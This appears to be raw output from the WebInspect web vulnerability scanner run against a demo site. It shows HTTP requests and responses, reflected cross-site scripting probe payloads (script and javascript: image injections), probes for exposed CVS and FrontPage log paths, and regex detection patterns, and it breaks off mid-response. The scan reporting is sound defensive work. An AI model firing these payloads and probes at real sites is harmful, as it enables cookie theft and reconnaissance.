<HEAD>
<BODY>
<form action=login.asp method=get>
Please login:<br>
Username: <input type=text name=UserName><br>
Password: <input type=password name=Password><br>
<input type=submit value="Login"><br>
<input type=hidden name=Action value="Login"><br>
</form>
</BODY></HTML>
Hidden Form ValueThis policy states that any area of the website or web application that contains sensitive information or access to privileged functionality such as remote site administration requires that hidden form fields are checked. Webinspect has detected that the URL <B> ~FullURL~ </b>has failed this policy.GET <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/link11/link12/link13/index.htm
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
GET /login/login.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/link11/link12/link13/index.htm
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:44 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 296
Content-Type: text/html
Cache-control: private
<HTML>
<HEAD>
<BODY>
<form action=login.asp method=get>
Please login:<br>
Username: <input type=text name=UserName><br>
Password: <input type=password name=Password><br>
<input type=submit value="Login"><br>
<input type=hidden name=Action value="Login"><br>
</form>
</BODY></HTML>
Possible Login FormA possible login form was found.GET <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/link11/link12/link13/index.htm
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
type=['"]?password['"]?GET /plink.asp?a=b&c=test@<script>alert(document.cookie)</script>.com HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:36:50 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 213
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "a" = b</P>
<P>The parameter "c" = test@<script>alert(document.cookie)</script>.com</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
Parameter-Based Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This cross-site scripting attack takes place because some web applications embed user input in JavaScript string literals.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "<script>alert(document.cookie)</script>" . If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?a=b&c=<attack>test@<script>alert(document.cookie)</script>.com</attack> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
test@<script>alert\(document\.cookie\)GET /login/login.asp?Action=Login&UserName=--><script>alert('XSS')</script>&Password=333%2D333%2D3333test@test999.com HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login/login.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:53:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 355
Content-Type: text/html
Cache-control: private
<HTML>
<HEAD>
<BODY>
<h1>Invalid username: --><script>alert('XSS')</script></h1>
<form action=login.asp method=get>
Please login:<br>
Username: <input type=text name=UserName><br>
Password: <input type=password name=Password><br>
<input type=submit value="Login"><br>
<input type=hidden name=Action value="Login"><br>
</form>
</BODY></HTML>
Possible Comment Injection Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place due to the fact that some web applications embed user input in the HTML comments. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?Action=Login&UserName=<attack>--><script>alert('XSS')</script></attack>&Password=333%2D333%2D3333test@test999.com <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/><var name="path"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
--><script>alert\('XSS'\)<\/script>GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=</textarea><script>alert('XSS')</script>&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:35 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4014
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE="</textarea><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible TextArea Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This particular type takes place when input is returned embedded in the TEXTAREA paramaters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=<attack></textarea><script>alert('XSS')</script></attack>&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\('XSS'\)</script>GET /_vti_log/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:25:54 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
Directory (_vti_log)<B>Found Directory:</B> /_vit_log
<BR<BR>Root web only. Only populated after the web administrator has enabled logging in the frontpg.ini or we<port>.cnf file. When active, an author.log file gets created here logging only FrontPage authoring and administration operations.Restrict access to important directories or files.
<BR><BR><B>Apache:</B>
<BR><A HREF="http://httpd.apache.org/docs/misc/security_tips.html">Security Tips
for Server Configuration</A>
<BR><A HREF="http://www.w3.org/Security/faq/wwwsf3.html">Protecting Confidential
Documents at Your Site</A>
<BR><A HREF="http://linux.com/security/newsitem.phtml?sid=12&aid=3667">Securing
Apache - Access Control</A>
<BR><BR>
<B>IIS:</B><BR>
<A HREF="http://www.microsoft.com/TechNet/iis/ntfssec.asp">Implementing NTFS
Standard Permissions on Your Web Site</A><BR><BR>
<B>Netscape:</B><BR>
<A HREF="http://developer.netscape.com/docs/manuals/enterprise/40/ag/esaccess.htm">Controlling
Access to Your Server</A>
<BR><BR>
<B>General:</B>
<BR><A HREF="http://www.hwg.org/lists/hwg-servers/passwords.html">Password
protecting web pages</A>
<BR><A HREF="http://www.microsoft.com/technet/security/chaptr14.asp">Web Security</A>GET <attack><var name="path"/></attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
3\d\d |2\d\d |40[13] |5\d\dGET /_vti_log/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:25:54 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
Existing filename found in commentsA URL or filename was found in the comments of the file and found to exist.Remove the comment.GET <var name="path"/> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
GET /CVS/Repository HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:34:23 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 07 Jan 2002 20:34:29 GMT
ETag: "343d74b4ba97c11:8f6"
Content-Length: 18
/home/src/html00
CVS RepositoryA common mistake by administrators or developers is to leave the CVS directory as a subdirectory on many of the folders in the web server. Information contained within that directory (such as usernames, filenames, path root, and IP addresses) could be recovered by an attacker and used for malicious purposes.GET /<attack>CVS/Repository</attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
2\d\d |40[1]GET /join.asp?name=&email=&surname=>"'><img%20src="javascript:alert('XSS')">&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:35 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4013
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=">"'><img src="javascript:alert('XSS')">"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
